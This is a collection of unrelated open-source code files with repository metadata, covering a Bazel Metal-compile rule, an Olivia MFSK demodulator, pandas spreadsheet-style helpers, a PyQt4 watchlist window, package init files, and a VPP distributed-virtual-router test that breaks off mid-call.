8562971108c11931618a220731c335e9fab9fb49
|
[
"Apache-2.0"
] | 1
|
2021-02-23T17:44:22.000Z
|
2021-02-23T17:44:22.000Z
|
apple/internal/resource_actions/metals.bzl
|
mccorkill1/rules_apple
|
8562971108c11931618a220731c335e9fab9fb49
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metal related actions."""
load(
"@build_bazel_apple_support//lib:apple_support.bzl",
"apple_support",
)
load(
"@bazel_skylib//lib:paths.bzl",
"paths",
)
def _metal_apple_target_triple(platform_prerequisites):
"""Returns a Metal target triple string for an Apple platform.
Args:
platform_prerequisites: The target's platform_prerequisites.
Returns:
A target triple string describing the platform.
"""
platform = platform_prerequisites.apple_fragment.single_arch_platform
xcode_config = platform_prerequisites.xcode_version_config
target_os_version = xcode_config.minimum_os_for_platform_type(
platform.platform_type,
)
platform_string = str(platform.platform_type)
if platform_string == "macos":
platform_string = "macosx"
environment = "" if platform.is_device else "-simulator"
return "air64-apple-{platform}{version}{environment}".format(
environment = environment,
platform = platform_string,
version = target_os_version,
)
def compile_metals(*, actions, input_files, output_file, platform_prerequisites, **kwargs):
"""Creates actions that compile .metal files into a single .metallib file.
Args:
actions: The actions provider from `ctx.actions`.
platform_prerequisites: Struct containing information on the platform being targeted.
input_files: The input metal files.
output_file: The output metallib file.
**kwargs: Ignored
"""
air_files = []
target = _metal_apple_target_triple(platform_prerequisites)
if not input_files:
fail("Input .metal files can't be empty")
# Compile each .metal file into a single .air file
for input_metal in input_files:
air_file = actions.declare_file(
paths.replace_extension(input_metal.basename, ".air"),
)
air_files.append(air_file)
args = actions.args()
args.add("metal")
args.add("-c")
args.add("-target", target)
args.add("-ffast-math")
args.add("-o", air_file)
args.add(input_metal)
apple_support.run(
actions = actions,
executable = "/usr/bin/xcrun",
inputs = [input_metal],
outputs = [air_file],
arguments = [args],
mnemonic = "MetalCompile",
apple_fragment = platform_prerequisites.apple_fragment,
xcode_config = platform_prerequisites.xcode_version_config,
)
# Compile .air files into a single .metallib file, which stores the Metal
# library
args = actions.args()
args.add("metallib")
args.add("-o", output_file)
args.add_all(air_files)
apple_support.run(
actions = actions,
executable = "/usr/bin/xcrun",
inputs = air_files,
outputs = [output_file],
arguments = [args],
mnemonic = "MetallibCompile",
apple_fragment = platform_prerequisites.apple_fragment,
xcode_config = platform_prerequisites.xcode_version_config,
)
| 33.234234
| 93
| 0.674709
|
2a71b6466ed1df0c69d0c7d2fcaa420eb97582c0
| 54
|
py
|
Python
|
src/model/components/__init__.py
|
atick-faisal/PyTorch-Starter
|
031f8e4f2a8b22ba4254ce0730598791d0b1673d
|
[
"MIT"
] | null | null | null |
src/model/components/__init__.py
|
atick-faisal/PyTorch-Starter
|
031f8e4f2a8b22ba4254ce0730598791d0b1673d
|
[
"MIT"
] | null | null | null |
src/model/components/__init__.py
|
atick-faisal/PyTorch-Starter
|
031f8e4f2a8b22ba4254ce0730598791d0b1673d
|
[
"MIT"
] | null | null | null |
from .conv import ConvBlock
from .mlp import MLPBlock
| 18
| 27
| 0.814815
|
233d14c25fe7a49f70a3e1b8f8d85884cd64588f
| 302
|
py
|
Python
|
bash.py
|
amirelemam/USP
|
a8ea2f6bd665b806299f61d05347af9895e3b359
|
[
"MIT"
] | 1
|
2020-03-29T02:35:08.000Z
|
2020-03-29T02:35:08.000Z
|
bash.py
|
amirelemam/Spammer-Detection-and-Sentiment-Analysis
|
a8ea2f6bd665b806299f61d05347af9895e3b359
|
[
"MIT"
] | 10
|
2016-11-30T09:40:31.000Z
|
2016-11-30T09:52:59.000Z
|
bash.py
|
amirelemam/Spammer-Detection-and-Sentiment-Analysis
|
a8ea2f6bd665b806299f61d05347af9895e3b359
|
[
"MIT"
] | null | null | null |
import subprocess
files = ["500k-1M", "1M-1.5M", "1.5M-2M", "2M-2-5M", "2.5M-3M",
"3M-3-5M", "3.5M-4M", "4M-4-5M", "4.5M-5M","5M-5-5M", "5.5M-6M",
"6M-6-5M", "6.5M-7M", "7M-7-5M"]
for item in files:
subprocess.call(["python", "spammer_detection_and_sentiment_analysis.py", item])
| 33.555556
| 84
| 0.569536
|
2e66d409e4c62138c6d10e4e77862ad3d2f8018c
| 5,769
|
py
|
Python
|
olivia-rx.py
|
blikkentrommel/olivia-python
|
24919599960ada89879a4608d8704e1e1480c860
|
[
"MIT"
] | null | null | null |
olivia-rx.py
|
blikkentrommel/olivia-python
|
24919599960ada89879a4608d8704e1e1480c860
|
[
"MIT"
] | 1
|
2022-01-12T02:31:37.000Z
|
2022-01-12T08:14:50.000Z
|
olivia-rx.py
|
blikkentrommel/olivia-python
|
24919599960ada89879a4608d8704e1e1480c860
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
OLIVIA MFSK Modulator
@author: Federico Santandrea
Source code is lightly commented for clarity.
Please read the document to better understand the various processes.
"""
# Libraries
import os, sys
import numpy as np
import sounddevice as sd
from numpy.fft import fft
# Hardcoded parameters
DEFAULT_PARAMS = "32/1000@1500"
SAMPLE_RATE = 8000
BLOCK_THRESHOLD = 24
# Global parameters
'''
Input:
- CENTER_FREQUENCY, SYMBOLS (# of tones), BANDWIDTH
Computed:
- spb: number of bits for a symbol
- fsep: frequency separation between tones, in Hz (also = baud rate)
- wlen: time separation between tones, in samples
'''
# Global objects
'''
- buf: audio sample input buffer
- sin: sounddevice InputStream for sample acquisition
'''
def __main__():
'''
Main program flow.
'''
welcomeAndSetup()
initSound()
syms = []
while True:
# Fetch new samples
updateBuffer()
sym = detectSymbol()
syms.append(sym)
if len(syms) == 64:
# Enough symbols to decode a block
if decodeAndPrintBlock(syms):
# Block decoded successfully, waiting for a new one
syms = []
else:
# Probably not a complete block, try rolling
syms = syms[1:]
#
def welcomeAndSetup():
'''
Decodes command line parameters and prints a welcome message.
'''
global CENTER_FREQUENCY, SYMBOLS, BANDWIDTH
global spb, fsep, wlen, slen
if len(sys.argv) == 1:
params = DEFAULT_PARAMS
elif len(sys.argv) == 2:
params = sys.argv[1]
else:
printUsageAndQuit()
try:
CENTER_FREQUENCY = int(params.split("@")[1])
SYMBOLS = int(params.split("/")[0])
BANDWIDTH = int(params.split("@")[0].split("/")[1])
spb = int(np.log2(SYMBOLS))
fsep = BANDWIDTH/SYMBOLS # = baud
wlen = int(np.ceil(SAMPLE_RATE/fsep))
except:
printUsageAndQuit()
if os.isatty(0):
print("*** Olivia demodulator ***")
print("(C) 2020 Federico Santandrea")
print("federico.santandrea@studio.unibo.it")
print()
print("Starting Olivia demodulator at center " + str(CENTER_FREQUENCY) +
"Hz, using " + str(SYMBOLS) + " tones over " + str(BANDWIDTH) + "Hz")
print()
def printUsageAndQuit():
'''
Prints usage help if needed.
'''
print("usage: " + sys.argv[0] + " [syms/bandwidth@centerfrequency]")
print("Example (default): " + sys.argv[0] + " " + DEFAULT_PARAMS)
quit()
def initSound():
'''
Prepares global InputStream for sample acquisition.
'''
global sin, buf
sin = sd.InputStream(samplerate=SAMPLE_RATE, blocksize=wlen,
#channels=2, device=2, # stereo mix
dtype=np.float32)
sin.start()
buf= np.zeros(wlen)
def updateBuffer():
'''
Acquires a new wlen-ful of samples from audio device.
'''
global buf
(samples, of) = sin.read(wlen)
buf = samples[:,0] # consider only one channel
def detectSymbol():
'''
Applies Fourier transform to audio buffer to detect
symbol corresponding to sampled tone.
Returns
-------
int
Most likely symbol number.
'''
spectrum = np.abs(fft(buf))
ix = CENTER_FREQUENCY - BANDWIDTH/2 + fsep/2
measures = np.zeros(SYMBOLS)
for i in range(0, SYMBOLS):
ix += fsep
measures[i] = spectrum[int(ix * wlen / SAMPLE_RATE)]
mix = np.argmax(measures)
return degray(mix)
def decodeAndPrintBlock(syms):
'''
Decodes a full block of 64 symbols, then prints it
to standard output.
'''
w = np.zeros((spb, 64))
# key = 0xE257E6D0291574EC
key = np.flip(np.array(
[1, 1, 1, 0, 0, 0, 1, 0,
0, 1, 0, 1, 0, 1, 1, 1,
1, 1, 1, 0, 0, 1, 1, 0,
1, 1, 0, 1, 0, 0, 0, 0,
0, 0, 1, 0, 1, 0, 0, 1,
0, 0, 0, 1, 0, 1, 0, 1,
0, 1, 1, 1, 0, 1, 0, 0,
1, 1, 1, 0, 1, 1, 0, 0]))
output = ""
doubt = 0
for i in range(0, spb):
for j in range(0, 64):
bit = (syms[j] >> ((i+j) % spb)) & 1
if bit == 1:
w[i,j] = -1
else:
w[i,j] = 1
w[i,:] = w[i,:] * (-2*np.roll(key, -13*i)+1)
w[i,:] = fwht(w[i,:])
c = np.argmax(np.abs(w[i,:]))
if abs(w[i,c]) < BLOCK_THRESHOLD:
doubt += 1
if w[i,c] < 0:
c = c + 64
if c != 0:
output += chr(c)
if doubt == 0:
print(output, end="", flush=True)
return True
else:
return False
#
def fwht(data):
'''
Fast Walsh-Hadamard transform.
'''
step = 1
while step < len(data):
for ptr in range(0, len(data), 2*step):
for ptr2 in range(ptr, step+ptr):
bit1 = data[ptr2]
bit2 = data[ptr2+step]
newbit1 = bit2
newbit1 = newbit1 + bit1
newbit2 = bit2
newbit2 = newbit2 - bit1
data[ptr2] = newbit1
data[ptr2+step] = newbit2
step *= 2
return data
def degray(n):
mask = n
while mask != 0:
mask >>= 1
n ^= mask
return n
#
#
__main__()
| 24.866379
| 84
| 0.500953
|
436e627f321a4c2846704de7f7d244c01207706b
| 2,242
|
py
|
Python
|
Z_ALL_FILE/Py1/tstststs.py
|
omikabir/omEngin
|
b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195
|
[
"Apache-2.0"
] | null | null | null |
Z_ALL_FILE/Py1/tstststs.py
|
omikabir/omEngin
|
b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195
|
[
"Apache-2.0"
] | null | null | null |
Z_ALL_FILE/Py1/tstststs.py
|
omikabir/omEngin
|
b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195
|
[
"Apache-2.0"
] | 1
|
2021-04-29T21:46:02.000Z
|
2021-04-29T21:46:02.000Z
|
import pandas as pd
def countif(col_as_range,criteria):
# col_as_range can be list or daraframe series
if isinstance(col_as_range,list):
count = col_as_range.count(criteria)
return count
elif isinstance(col_as_range, pd.core.series.Series):
col_range_list = col_as_range.values.tolist()
count = col_range_list.count(criteria)
return count
else:
return "none"
# way of calling - print(countif(df['Colname'],"value_to_check"))
# we call above countif function using loop on dataframe and can store the result into a new column as following.
def match(srcstr,list_as_range,start_from = False):
try:
if start_from == False or start_from == "First":
if isinstance(list_as_range,list):
indices = [i for i, x in enumerate(list_as_range) if x == srcstr]
return indices[0]
elif isinstance(list_as_range, pd.core.series.Series):
col_range_list = list_as_range.values.tolist()
indices = [i for i, x in enumerate(col_range_list) if x == srcstr]
return indices[0]
else:
return "none"
elif start_from == "Last":
if isinstance(list_as_range,list):
indices = [i for i, x in enumerate(list_as_range) if x == srcstr]
ln = len(indices)
return indices[ln-1]
elif isinstance(list_as_range, pd.core.series.Series):
col_range_list = list_as_range.values.tolist()
indices = [i for i, x in enumerate(col_range_list) if x == srcstr]
ln = len(indices)
return indices[ln-1]
else:
return "none"
except:
return "NA"
df = pd.DataFrame({
'column_1': ['g', 't', 'n', 'w', 'n', 'g']
})
print(match('n',df['column_1'],"Last"))
df = df.assign(new_column = "NA")
list_as_range = df['column_1'].values.tolist() #column_1 is the column name (can be any column)
for i in range(len(df)):
cell_value = df.loc[i,'column_1'] #column_1 is the column name (can be any column)
df.loc[i,'new_column'] = countif(list_as_range, cell_value) #calling above functions
#print(df)
| 39.333333
| 113
| 0.607493
|
3ae2122a5cdb4a6a1e0b7c1ad6b50f14236eb3d4
| 10,998
|
py
|
Python
|
exampleWatchlistUI.py
|
laurencejbelliott/groupB4OMDB_API
|
e5d79cbe17b50ceeb17bcd08d1107ac694d835ac
|
[
"MIT"
] | 1
|
2018-11-25T12:29:46.000Z
|
2018-11-25T12:29:46.000Z
|
exampleWatchlistUI.py
|
laurencejbelliott/groupB4OMDB_API
|
e5d79cbe17b50ceeb17bcd08d1107ac694d835ac
|
[
"MIT"
] | null | null | null |
exampleWatchlistUI.py
|
laurencejbelliott/groupB4OMDB_API
|
e5d79cbe17b50ceeb17bcd08d1107ac694d835ac
|
[
"MIT"
] | 1
|
2018-12-13T12:42:00.000Z
|
2018-12-13T12:42:00.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'exampleWatchlist.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# This code is to be used as a reference for the code for generating the watchlist
# window when a user loads their watchlist file
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(800, 600)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 801, 551))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.scrollArea = QtGui.QScrollArea(self.horizontalLayoutWidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 130, 547))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.verticalLayoutWidget = QtGui.QWidget(self.scrollAreaWidgetContents)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 131, 551))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.pushButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.verticalLayout_3.addWidget(self.pushButton)
self.pushButton_2 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.verticalLayout_3.addWidget(self.pushButton_2)
self.pushButton_3 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.verticalLayout_3.addWidget(self.pushButton_3)
self.pushButton_4 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_4.setObjectName(_fromUtf8("pushButton_4"))
self.verticalLayout_3.addWidget(self.pushButton_4)
self.pushButton_5 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_5.setObjectName(_fromUtf8("pushButton_5"))
self.verticalLayout_3.addWidget(self.pushButton_5)
self.pushButton_6 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_6.setObjectName(_fromUtf8("pushButton_6"))
self.verticalLayout_3.addWidget(self.pushButton_6)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
self.scrollArea_2 = QtGui.QScrollArea(self.horizontalLayoutWidget)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents_3 = QtGui.QWidget()
self.scrollAreaWidgetContents_3.setGeometry(QtCore.QRect(0, 0, 659, 547))
self.scrollAreaWidgetContents_3.setObjectName(_fromUtf8("scrollAreaWidgetContents_3"))
self.verticalLayoutWidget_2 = QtGui.QWidget(self.scrollAreaWidgetContents_3)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(-1, -1, 661, 551))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout_4 = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.label = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_4.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout_4.addWidget(self.label_2)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout_4.addWidget(self.label_3)
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.verticalLayout_4.addWidget(self.label_4)
self.label_5 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout_4.addWidget(self.label_5)
self.label_6 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.verticalLayout_4.addWidget(self.label_6)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_4.addItem(spacerItem1)
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents_3)
self.horizontalLayout_2.addWidget(self.scrollArea_2)
self.horizontalLayout_2.setStretch(0, 1)
self.horizontalLayout_2.setStretch(1, 5)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtGui.QAction(MainWindow)
self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
self.actionSave = QtGui.QAction(MainWindow)
self.actionSave.setObjectName(_fromUtf8("actionSave"))
self.actionQuit = QtGui.QAction(MainWindow)
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionSave)
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
# The following is our hand-typed code within the designer generated constructor method
# When the Quit action from menu bar is clicked or the shortcut is entered,
# close the watchlist window
self.actionQuit.triggered.connect(MainWindow.close)
self.actionOpen.triggered.connect(self.openWatchlist)
# When the Open action from menu bar is clicked or the shortcut is entered,
# get the path of the watchlist file via a QFileDialog
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Movie Information - Watchlist", None))
self.pushButton.setText(_translate("MainWindow", "More Details: 1", None))
self.pushButton_2.setText(_translate("MainWindow", "More Details: 2", None))
self.pushButton_3.setText(_translate("MainWindow", "More Details: 3", None))
self.pushButton_4.setText(_translate("MainWindow", "More Details: 4", None))
self.pushButton_5.setText(_translate("MainWindow", "More Details: 5", None))
self.pushButton_6.setText(_translate("MainWindow", "More Details: 6", None))
self.label.setText(_translate("MainWindow", "1: Captain America: Civil War (2016)", None))
self.label_2.setText(_translate("MainWindow", "2: Good Will Hunting (1997)", None))
self.label_3.setText(_translate("MainWindow", "3: Black Hawk Down (2001)", None))
self.label_4.setText(_translate("MainWindow", "4: Jimmy Neutron Boy Genius (2001)", None))
self.label_5.setText(_translate("MainWindow", "5: Despicable Me (2010)", None))
self.label_6.setText(_translate("MainWindow", "6: Watchmen (2009)", None))
self.menuFile.setTitle(_translate("MainWindow", "File", None))
self.actionOpen.setText(_translate("MainWindow", "Open", None))
self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+O", None))
self.actionSave.setText(_translate("MainWindow", "Save", None))
self.actionSave.setShortcut(_translate("MainWindow", "Ctrl+S", None))
self.actionQuit.setText(_translate("MainWindow", "Quit", None))
self.actionQuit.setShortcut(_translate("MainWindow", "Ctrl+Q", None))
def openWatchlist(self):
wlPath = QtGui.QFileDialog.getOpenFileName(MainWindow,
'Open watchlist file', 'c:\\', 'Watchlist files (*.wl)')
print wlPath, "\n"
with open(wlPath, "r") as wlFile:
print wlFile.read()
# This code in the scope of this 'if statement' runs if the code is executed directly, as opposed to being imported
# in another Python script. This is where the execution of the program code begins.
if __name__ == "__main__":
# The 'sys' module is imported to allow the program's execution to be halted once the user has
# closed the application.
import sys
# The application object is defined. 'sys.argv' represents a list of parameters provided by the user
# when executing the program from the terminal / command prompt. Our program doesn't make use of any, but it is
# convention in PyQt programming to accept them.
app = QtGui.QApplication(sys.argv)
# A generic window object is instantiated to be used as a parameter of the'setupUi' method of
# the 'Ui_Mainwindow' class.
icon = QtGui.QIcon()
icon.addFile('images/SELogoSmall.png', QtCore.QSize(256, 256))
app.setWindowIcon(icon)
MainWindow = QtGui.QMainWindow()
# The main / home window of the application is instatiated as 'ui', and its setup method is called
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
# The main window is displayed to the user.
MainWindow.show()
# When the execution of the application has been ended by the user, the scripts execution stops.
sys.exit(app.exec_())
| 56.4
| 115
| 0.726314
|
913cae46ed5e7916338153c8a0bf517efd4902e3
| 684
|
py
|
Python
|
python/packages/isce3/geometry/__init__.py
|
piyushrpt/isce3
|
1741af321470cb5939693459765d11a19c5c6fc2
|
[
"Apache-2.0"
] | null | null | null |
python/packages/isce3/geometry/__init__.py
|
piyushrpt/isce3
|
1741af321470cb5939693459765d11a19c5c6fc2
|
[
"Apache-2.0"
] | null | null | null |
python/packages/isce3/geometry/__init__.py
|
piyushrpt/isce3
|
1741af321470cb5939693459765d11a19c5c6fc2
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding: utf-8 -*-
# Import the wrappers
from .Rdr2geo import rdr2geo_point, rdr2geo_cone
from .Geo2rdr import geo2rdr_point
from .geometry import getGeoPerimeter
def rdr2geo(**kwds):
"""A factory for Rdr2geo"""
from .Rdr2geo import Rdr2geo
return Rdr2geo(**kwds)
def geo2rdr(**kwds):
"""A factory for Geo2rdr"""
from .Geo2rdr import Geo2rdr
return Geo2rdr(**kwds)
def geocode(**kwds):
"""A factory for Geocode"""
from .Geocode import Geocode
return Geocode(**kwds)
def deminterpolator(**kwds):
"""A factory for DEMInterpolator"""
from .DEMInterpolator import DEMInterpolator
return DEMInterpolator(**kwds)
# end of file
| 20.117647
| 48
| 0.69152
|
07ea7878a74b9bccd1d09edd3d3e5cb0891f24c6
| 14,938
|
py
|
Python
|
test/test_dvr.py
|
mjnitp/vpp
|
537e85deab6fd916952ff4badeda4ec5d6f1a121
|
[
"Apache-2.0"
] | 1
|
2019-03-23T21:06:14.000Z
|
2019-03-23T21:06:14.000Z
|
test/test_dvr.py
|
fantastic2085/vpp
|
c599c6f001bc28e1023fb5e74a27db37b1aae847
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:31:18.000Z
|
2021-06-01T23:31:18.000Z
|
test/test_dvr.py
|
fantastic2085/vpp
|
c599c6f001bc28e1023fb5e74a27db37b1aae847
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import unittest
from framework import VppTestCase, VppTestRunner
from vpp_sub_interface import VppDot1QSubint
from vpp_ip_route import VppIpRoute, VppRoutePath
from vpp_papi_provider import L2_VTR_OP, L2_PORT_TYPE
from scapy.packet import Raw
from scapy.layers.l2 import Ether, Dot1Q
from scapy.layers.inet import IP, UDP
from socket import AF_INET, inet_pton
class TestDVR(VppTestCase):
""" Distributed Virtual Router """
def setUp(self):
super(TestDVR, self).setUp()
self.create_pg_interfaces(range(4))
self.create_loopback_interfaces(1)
for i in self.pg_interfaces:
i.admin_up()
self.loop0.config_ip4()
def tearDown(self):
for i in self.pg_interfaces:
i.admin_down()
self.loop0.unconfig_ip4()
super(TestDVR, self).tearDown()
def assert_same_mac_addr(self, tx, rx):
t_eth = tx[Ether]
for p in rx:
r_eth = p[Ether]
self.assertEqual(t_eth.src, r_eth.src)
self.assertEqual(t_eth.dst, r_eth.dst)
def assert_has_vlan_tag(self, tag, rx):
for p in rx:
r_1q = p[Dot1Q]
self.assertEqual(tag, r_1q.vlan)
def assert_has_no_tag(self, rx):
for p in rx:
self.assertFalse(p.haslayer(Dot1Q))
def test_dvr(self):
""" Distributed Virtual Router """
#
# A packet destined to an IP address that is L2 bridged via
# a non-tag interface
#
ip_non_tag_bridged = "10.10.10.10"
ip_tag_bridged = "10.10.10.11"
any_src_addr = "1.1.1.1"
pkt_no_tag = (Ether(src=self.pg0.remote_mac,
dst=self.loop0.local_mac) /
IP(src=any_src_addr,
dst=ip_non_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_tag = (Ether(src=self.pg0.remote_mac,
dst=self.loop0.local_mac) /
IP(src=any_src_addr,
dst=ip_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
#
# Two sub-interfaces so we can test VLAN tag push/pop
#
sub_if_on_pg2 = VppDot1QSubint(self, self.pg2, 92)
sub_if_on_pg3 = VppDot1QSubint(self, self.pg3, 93)
sub_if_on_pg2.admin_up()
sub_if_on_pg3.admin_up()
#
# Put all the interfaces into a new bridge domain
#
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.loop0.sw_if_index, bd_id=1,
port_type=L2_PORT_TYPE.BVI)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg2.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=92)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg3.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=93)
#
# Add routes to bridge the traffic via a tagged an nontagged interface
#
route_no_tag = VppIpRoute(
self, ip_non_tag_bridged, 32,
[VppRoutePath("0.0.0.0",
self.pg1.sw_if_index,
is_dvr=1)])
route_no_tag.add_vpp_config()
#
# Inject the packet that arrives and leaves on a non-tagged interface
# Since it's 'bridged' expect that the MAC headed is unchanged.
#
rx = self.send_and_expect(self.pg0, pkt_no_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_no_tag, rx)
self.assert_has_no_tag(rx)
#
# Add routes to bridge the traffic via a tagged interface
#
route_with_tag = VppIpRoute(
self, ip_tag_bridged, 32,
[VppRoutePath("0.0.0.0",
sub_if_on_pg3.sw_if_index,
is_dvr=1)])
route_with_tag.add_vpp_config()
#
# Inject the packet that arrives non-tag and leaves on a tagged
# interface
#
rx = self.send_and_expect(self.pg0, pkt_tag * 65, self.pg3)
self.assert_same_mac_addr(pkt_tag, rx)
self.assert_has_vlan_tag(93, rx)
#
# Tag to tag
#
pkt_tag_to_tag = (Ether(src=self.pg2.remote_mac,
dst=self.loop0.local_mac) /
Dot1Q(vlan=92) /
IP(src=any_src_addr,
dst=ip_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
rx = self.send_and_expect(self.pg2, pkt_tag_to_tag * 65, self.pg3)
self.assert_same_mac_addr(pkt_tag_to_tag, rx)
self.assert_has_vlan_tag(93, rx)
#
# Tag to non-Tag
#
pkt_tag_to_non_tag = (Ether(src=self.pg2.remote_mac,
dst=self.loop0.local_mac) /
Dot1Q(vlan=92) /
IP(src=any_src_addr,
dst=ip_non_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
rx = self.send_and_expect(self.pg2, pkt_tag_to_non_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_tag_to_tag, rx)
self.assert_has_no_tag(rx)
#
# Add an output L3 ACL that will block the traffic
#
rule_1 = ({'is_permit': 0,
'is_ipv6': 0,
'proto': 17,
'srcport_or_icmptype_first': 1234,
'srcport_or_icmptype_last': 1234,
'src_ip_prefix_len': 32,
'src_ip_addr': inet_pton(AF_INET, any_src_addr),
'dstport_or_icmpcode_first': 1234,
'dstport_or_icmpcode_last': 1234,
'dst_ip_prefix_len': 32,
'dst_ip_addr': inet_pton(AF_INET, ip_non_tag_bridged)})
acl = self.vapi.acl_add_replace(acl_index=4294967295,
r=[rule_1])
#
# Apply the ACL on the output interface
#
self.vapi.acl_interface_set_acl_list(self.pg1.sw_if_index,
0,
